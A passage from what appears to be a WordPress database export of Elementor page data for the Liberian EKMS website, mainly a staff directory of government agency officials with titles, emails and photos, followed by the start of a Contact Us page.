ull},\"elements\":[{\"id\":\"cc8ab59\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Anthony Kullie<\\/strong><br \\/>Director of LHS<br \\/>MME<br \\/><a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"cfc0f42\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"571bd4b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Ernest M. Menseah <\\/strong><br \\/>Director of LGS<br \\/>MME<br \\/><a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c5f9301\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"976bac9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Wonpue Quellian <\\/strong><br \\/>Research Officer<br \\/>MME<br \\/><a href=\\\"mailto:wonpuequellian2017@gmail.com\\\">wonpuequellian2017@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c167ff3\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f869f0a\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"309e701\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ad4abd4\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/Uriah.png\",\"id\":3347}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"5c6f852\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"4463645\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"7731dcd\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"41cb42e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4b566af\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"201ee41\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Uriah Garsinii <\\/strong><br \\/>Land Use Management Manager<br \\/>LLA<br \\/><a href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"78f07ce\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"464f4ae\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9564f30\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/mr-wesseh.png\",\"id\":3367},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"20138ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cd79b29\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/WIN_20160609_11_17_46_Pro.jpg\",\"id\":3160},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b7fd678\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/AlFreeman.jpg\",\"id\":3183},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Aaron S.M. Wesseh<\\/strong><br \\/>Manager<br \\/>Cross-Cutting Capacity Development Project<br \\/>EPA<br \\/><a href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0cfcbe5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"865743e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jesse Mathies<\\/strong><br \\/>Assistant Director<br \\/>Division of Foreign Trade<br \\/>MOCI<br \\/><a href=\\\"mailto:jesmathies@gmail.com\\\">jesmathies@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98255ed\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0322201\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Alphonso Freeman<\\/strong><br \\/>Biosafety Officer<br \\/>National Standard Laboratory<br \\/>MOCI<br \\/><a href=\\\"mailto:freemanalphonso29@yahoo.com\\\">freemanalphonso29@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ea0ab9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c682593\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc24385\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"5ae9515\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/1.jpg\",\"id\":3165},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"dbcd9dd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f37529a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/golafale.png\",\"id\":3351}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"992774f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"77967dc\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae8e0aa\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2763f7b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"435cd31\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lasana M. Donzo<\\/strong><br \\/>Coordinator for Standards<br \\/>Bureau of Industrial Services<br \\/>MOCI<br \\/><a href=\\\"mailto:lasanadonzo@yahoo.com\\\">lasanadonzo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0a4b126\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ea9a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Mambu Golafale<\\/strong><br \\/>Senior Research Officer<br \\/>Division of Knowledge Management &amp; Archive<br \\/>MOCI<br \\/><a href=\\\"mailto:mgolafale1@gmail.com\\\">mgolafale1@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b3d1f48\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a9ecf24\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>S. Ahmed Sheriff <\\/strong><br \\/>Director<br \\/>Department of Marine Fisheries and Environment<br \\/>NaFAA<br \\/><a href=\\\"sasherif@nafaa.gov.lr\\\">sasherif@nafaa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"738e0dd\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6e7b3da\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"e8bed5f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d1d7c9e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/yokie.png\",\"id\":3355}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"918d54e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"27df91b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kumeh.png\",\"id\":3360}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"94412fe\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a7132bc\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/02\\/nafaa.png\",\"id\":3520}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"74f915b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e88acc7\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"d32c806\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f40392e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Anthony A. Yokie<\\/strong>\\n<\\/br>\\nManager\\n<\\/br>\\nDepartment of Marine Fisheries and Environment\\n<\\/br>\\nNaFAA\\n<\\/br>\\n<a href=\\\"mailto:ayokie@nafaa.gov.lr\\\">ayokie@nafaa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"23fe33d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a594c07\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Joyce W. Kumeh<\\/strong><br \\/>Coastal Zone Supervisor<br \\/>NaFAA<br \\/><a href=\\\"mailto:jkumeh@nafaa.gov.lr\\\">jkumeh@nafaa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"27d77d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"861733c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Urias B. Barclay<\\/strong><br \\/>Environmental Technician<br \\/>NaFAA<br \\/><a href=\\\"mailto:ubbarclay@gmail.com\\\">ubbarclay@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"aca08f0\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"08c437c\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc69fab\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3690a1d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/lavalah.png\",\"id\":3364}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"aff1f4a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b216801\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"6cccf87\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6a59ec5\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23ca2d4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4f48179\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Atty. Stephen B. Lavalah <\\/strong><br \\/>Associate Director<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<br \\/><a href=\\\"&quot;mailto:stephenlavalah@yahoo.com\\\">stephenlavalah@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a0aec03\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d029a1b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Nadine Ajamia<\\/strong><br \\/>Policy Officer<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a9bce89\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6cd1f2c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Henry Y. Kesselly<\\/strong><br \\/>Senior Research Officer<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1f03dc8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"33e80f1\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"5c25b8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0080713\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"b4a2e51\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3fc1d16\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/sherman.png\",\"id\":3644}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"e3dd1e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"758c067\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/borbor.png\",\"id\":3646}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ad72733\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"707d444\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23520fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a5788b6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konah Kaliku<\\/strong><br \\/>Environmental Inspector<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"18738fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"369beaa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Albert M. Sherman <\\/strong><br \\/>MOT<br \\/><a href=\\\"mailto:itssherman@gmail.com\\\">itssherman@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"bd520e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e5b0622\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Amos Borbor <\\/strong><br \\/>Finance &amp; Administrative Officer<br \\/>MOT<br \\/><a href=\\\"mailto:felixborbor@gmail.com\\\">felixborbor@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e860d0b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f6d0ce0\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6b97206\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"58a8bc8\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/simpson.png\",\"id\":3651}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"76384d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c4dcbf8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"9d55206\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8c09b65\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"a0b7d70\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"c7ec2c4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Henry A. Simpson <\\/strong><br \\/>Weather Forecaster<br \\/>MOT<br \\/><a href=\\\"mailto:ransford2024@gmail.com\\\">ransford2024@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ea624a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"c5ecaba\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>James Kollie <\\/strong><br \\/>MOT<br \\/><a href=\\\"mailto:jameskollie@yahoo.com\\\">jameskollie@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c8f36c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"308cd55\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Eric Pervist <\\/strong><br \\/>MGCSP<br \\/><a href=\\\"mailto:gendermedia1@gmail.com\\\">gendermedia1@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bcdddb1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"98f890d\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"c45b21c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3f07c86\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"1205269\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"5891ccb\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/domah.png\",\"id\":3659}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"ace9d4f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"765a1b9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6893e76\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"237d9e7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1d02417\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>N. Mamatu G. King <\\/strong><br \\/>MGCSP<br \\/><a href=\\\"mailto:kingmamatu@gmail.com\\\">kingmamatu@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9d523fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d8aba5e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>J. Josiah N. Domah <\\/strong><br \\/>Administrative Assistant, Office of the Minister<br \\/>MGCSP<br \\/><a href=\\\"mailto:josiahdomah@@gmail.com\\\">josiahdomah@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"be454e0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b64ac2b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Emmanuel G. Ballah <\\/strong><br \\/>MGCSP<br \\/><a href=\\\"mailto:emmanuelgballah_@gmail.com\\\">emmanuelgballah_@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(34871,5095,'_elementor_pro_version','3.7.1'),(34872,5096,'_elementor_edit_mode','builder'),(34873,5096,'_elementor_template_type','wp-page'),(34874,5096,'_elementor_version','3.6.6'),(34875,5096,'_wp_page_template','default'),(34876,5096,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\"}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\"}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk<\\/a> or fill out the contact form below:<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\"}]},\"elements\":[{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"space_between_widgets\":-23},\"elements\":[{\"id\":\"92e0be0\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"ca88780\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[everest_form 